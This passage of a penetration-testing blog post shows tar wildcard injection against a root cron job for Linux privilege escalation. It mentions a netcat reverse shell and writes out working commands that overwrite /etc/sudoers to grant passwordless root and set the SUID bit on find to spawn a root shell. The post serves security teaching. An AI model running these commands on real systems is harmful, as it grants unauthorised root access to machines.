*/1 *   * * *   root    /info/script.sh</pre><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i1.wp.com/4.bp.blogspot.com/-tMQZT2zqPNI/Wy4yao0uODI/AAAAAAAAXgE/yB1XYj9UYlg4s97aXnx6Gwe1irwE2NYrQCEwYBhgL/s1600/11.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>And after 1 minute you will notice the backup.tgz file is generated inside the info directory.</p><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i1.wp.com/3.bp.blogspot.com/-i7oV74f4PmQ/Wy4ya67SSaI/AAAAAAAAXgE/MQsqZ2-6Z-0fWJWObJW2gC8cc1LpOneIgCEwYBhgL/s1600/12.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><h3><strong>Tar Wildcard Injection</strong></h3><p><strong>Inject netcat </strong><strong>reverse</strong><strong> _shell </strong><strong> for Privilege Escalation</strong></p><p>Start your attacking machine and first compromise the target system and then move to the privilege escalation stage. Suppose I successfully login into the victim’s machine through ssh and access non-root user terminal. Then open crontab to view if any job is scheduled.</p><pre class="lang:default decode:true">cat /etc/crontab</pre><p>Here we notice the target has scheduled a bash program script for every 1 minute and we know that cron job runs as root. The minute attacker read the program written inside the script.sh, he can apply the tar wildcard injection.</p><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i0.wp.com/3.bp.blogspot.com/-MWto_BployQ/Wy4ybMF7sOI/AAAAAAAAXgE/T14QSmP99csxygcL6LoUhwoKxKHIh37OACEwYBhgL/s1600/13.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>Again generate netcat reverse shell payload as done above.</p><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i2.wp.com/4.bp.blogspot.com/-wQDqcAvVluk/Wy4ybRkC68I/AAAAAAAAXf8/38-nzuIdz7E2CRSioN4oitFPYgY_THUwQCEwYBhgL/s1600/15.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>And again repeat the above step as shown in the image.</p><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i1.wp.com/4.bp.blogspot.com/-M4dUJIQEPDI/Wy4ybjSXuUI/AAAAAAAAXgE/5cg-fe7u72c3oUnH6VEnvacJ_TSMi0ckACEwYBhgL/s1600/16.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>Then get back to netcat shell for the victim’s reverse connection and you will notice after 1 minute you get victim’s netcat session.</p><pre class="lang:default decode:true">whoami
cd /root
pwd</pre><p>Hence, the target can be easily exploited if he makes a usage tar archive program either by scheduling a job via command or through bash script.</p><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i0.wp.com/3.bp.blogspot.com/-6SsWohfgoeo/Wy4ycMLz12I/AAAAAAAAXgA/xmDPABxMCLk4FQboAazab4IDYNqY6T_pgCEwYBhgL/s1600/17.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><h3><strong>Tar Wildcard Injection (2<sup>nd</sup> method)</strong></h3><p><strong>Exploit Sudoers file for Privilege Escalation</strong></p><p>Basically, with help wildcard injection an attack wants to gain the highest privilege of the system, therefore, he will try to inject some malicious code with help of tar for root access. But there are multiple ways to obtain root access and hence you can apply the following techniques for privilege escalation.</p><p>Suppose you have victim’s machine as a non-root user and for privilege escalation either take root access or try to give sudo right to non-root user by adding him sudoers file. Thus you can take help of following commands.</p><pre class="lang:default decode:true">echo 'echo "ignite ALL=(root) NOPASSWD: ALL" &gt; /etc/sudoers' &gt; demo.sh
echo "" &gt; "--checkpoint-action=exec=sh demo.sh"
echo "" &gt; --checkpoint=1
tar cf archive.tar *</pre><p>With the help of above command we had tried to give root permission to the user: ignite and for 1 minute. After 1 minute passed we successfully owned the root account.</p><pre class="lang:default decode:true">sudo -l
sudo bash
whoami</pre><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i2.wp.com/1.bp.blogspot.com/-uPMOZswJTjg/Wy4yc5Fff9I/AAAAAAAAXgU/ccFKOiLDy50HwETU1EtQ8u2g5ACOFMLFACEwYBhgL/s1600/18.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><h3><strong>Tar Wildcard Injection (3<sup>rd</sup> method)</strong></h3><p><strong>Privilege Escalation-Give SUID permission to system binaries</strong></p><p>There are multiple ways for privilege escalation with help of tar injection but we are discussing very few methods among them. Suppose you have victim’s machine as the non-root user and for privilege escalation, you can try to enable SUID bit for any system binaries and likewise above again you can take help of the following command for obtaining root access.</p><pre class="lang:default decode:true">echo "chmod u+s /usr/bin/find" &gt; test.sh
echo "" &gt; "--checkpoint-action=exec=sh test.sh"
echo "" &gt; --checkpoint=1
tar cf archive.tar *
ls -al /usr/bin/find
find f1 -exec "whoami" \;
root
find f1 -exec "/bin/sh" \;
id
whoami</pre><p>We Hope, you people will enjoy these tricks while penetration testing.</p><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i0.wp.com/3.bp.blogspot.com/-O2lhkg-YydQ/Wy4yc4FoSkI/AAAAAAAAXgE/LHf2Z4NL9EgDQfHc5GdPAq8PNHUq3d76QCEwYBhgL/s1600/19.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p><strong>Source: </strong>//www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt</p></div><aside><ul class="post-tag"><li><a href="https://sakibulalikhan.github.io/blog/amp/tags/blog/">Blog</a></li><li><a href="https://sakibulalikhan.github.io/blog/amp/tags/linux/">Linux</a></li><li><a href="https://sakibulalikhan.github.io/blog/amp/tags/linux-privilege-escalation/">Linux Privilege Escalation</a></li></ul><div class="post-share"><amp-social-share type="system" width="40" height="40" data-param-text="Exploiting Wildcard for Privilege Escalation"></amp-social-share><amp-social-share type="facebook" width="40" height="40" data-param-app_id="" data-param-text="Exploiting Wildcard for Privilege Escalation" data-param-href="https://sakibulalikhan.github.io/blog/amp/exploiting-wildcard-for-privilege-escalation.html"></amp-social-share><amp-social-share type="twitter" width="40" height="40" data-param-text="Exploiting Wildcard for Privilege Escalation" data-param-url="https://sakibulalikhan.github.io/blog/amp/exploiting-wildcard-for-privilege-escalation.html"></amp-social-share><amp-social-share type="pinterest" width="40" height="40" data-param-url="https://sakibulalikhan.github.io/blog/amp/exploiting-wildcard-for-privilege-escalation.html"></amp-social-share><amp-social-share type="tumblr" width="40" height="40" data-param-text="Exploiting Wildcard for Privilege Escalation" data-param-url="https://sakibulalikhan.github.io/blog/amp/exploiting-wildcard-for-privilege-escalation.html"></amp-social-share><amp-social-share type="whatsapp" width="40" height="40" data-param-text="Exploiting Wildcard for Privilege Escalation" data-param-url="https://sakibulalikhan.github.io/blog/amp/exploiting-wildcard-for-privilege-escalation.html"></amp-social-share></div></aside></div></article></main><amp-animation id="showAnim" layout="nodisplay"><script type="application/json">{
                    "duration": "200ms",
                    "fill": "both",
                    "iterations": "1",
                    "direction": "alternate",
                    "animations": [{
                        "selector": ".post-scroll",
                        "keyframes": [{
                            "opacity": "1",
                            "visibility": "visible",
                            "transform": "scale(1)"
                        }]
                    }]
                }</script></amp-animation><amp-animation id="hideAnim" layout="nodisplay"><script type="application/json">{
                    "duration": "200ms",
                    "fill": "both",
                    "iterations": "1",
                    "direction": "alternate",
                    "animations": [{
                        "selector": ".post-scroll",
                        "keyframes": [{
                            "opacity": "0",
                            "visibility": "hidden",
                            "transform": "scale(0.1)"
                        }]
                    }]
                }</script></amp-animation><div class="post-scroll-marker"><amp-position-observer on="enter:hideAnim.start; exit:showAnim.start" layout="nodisplay"></amp-position-observer></div><button class="post-scroll" on="tap:top.scrollTo(duration=200)">&#8593;</button><footer class="bottom">COPYRIGHT © SAKIBUL ALI KHAN.</footer><amp-sidebar id="navbar-sidebar" layout="nodisplay"><ul><li><a href="https://sakibulalikhan.ml/" title="https://sakibulalikhan.ml/">Home</a></li><li><a href="https://sakibulalikhan.github.io/blog/amp/" title="https://blog.sakibulalikhan.ml/">Blog</a></li><li><a href="https://www.linkedin.com/in/sakibulalikhan/" title="https://sakibulalikhan.github.io/about-me">About Me</a></li></ul></amp-sidebar></body></html>